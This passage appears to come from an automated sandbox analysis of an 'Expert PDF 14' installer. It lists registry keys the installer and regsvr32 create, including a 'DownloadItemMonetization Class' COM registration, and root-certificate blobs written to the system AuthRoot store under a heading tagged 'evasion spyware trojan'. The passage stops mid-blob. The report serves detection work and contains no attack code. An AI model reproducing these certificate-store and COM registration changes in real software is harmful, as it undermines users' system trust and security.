Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{356EF9DF-D3FE-4DA6-9EF9-B29CEF99A571}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{883556F2-137D-42B1-A379-EF040DB83897}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AC45A346-0197-4696-8D32-758EC0B0E4DF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1410AE4F-1218-4A9F-87D9-666B1DB82FF1}\ = "Installer Class" C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{88395ED4-CB15-449D-AA03-0286C132147C}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{45B9EEC4-462E-427D-B2AA-26380735AE7A}\ = "IGeoIPStruct" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{066D076C-674B-477C-A219-17FE4B04FE7D}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{54D1BE8B-911E-4F28-BC0D-E7545D5FD83B}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0C65FB04-3503-4B15-A148-8904F9450F50}\Version\ = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7EAF85B3-F511-4B8D-8731-95015ACED100}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3D22F5C-199D-42A3-B1DE-215B57F8F065}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{243F1D9D-80F0-42A2-9A44-3F6ADDCFE4EC}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7AE953E8-514E-4210-A41A-B6ACE120EC12}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\ = "IStartItemModule" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{904A1997-BEDF-4442-9F5B-D1CBE8308AC1}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3D22F5C-199D-42A3-B1DE-215B57F8F065}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{634F0C3D-F260-4CC2-83A0-75CA11EE53FC}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{243F1D9D-80F0-42A2-9A44-3F6ADDCFE4EC}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E66B52BF-144D-4611-9366-62C9B3A3BD0B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA738FC0-B58C-4717-BF65-F2034D0ABC09}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF8D15E0-84AC-4108-A158-348EEBA6C2FC}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0BBD5633-4BE2-42D0-BB7E-A021DF1E1753}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F0943358-2D26-4A19-A9DF-C949F475DDE3} C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{904A1997-BEDF-4442-9F5B-D1CBE8308AC1}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F73F2CD9-8FD0-419C-9BD8-3CD10A82E263}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\ = "DownloadItemMonetization Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A299F69F-9A31-485B-9743-F015326A9B0D}\TypeLib\Version = "1.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{634F0C3D-F260-4CC2-83A0-75CA11EE53FC}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6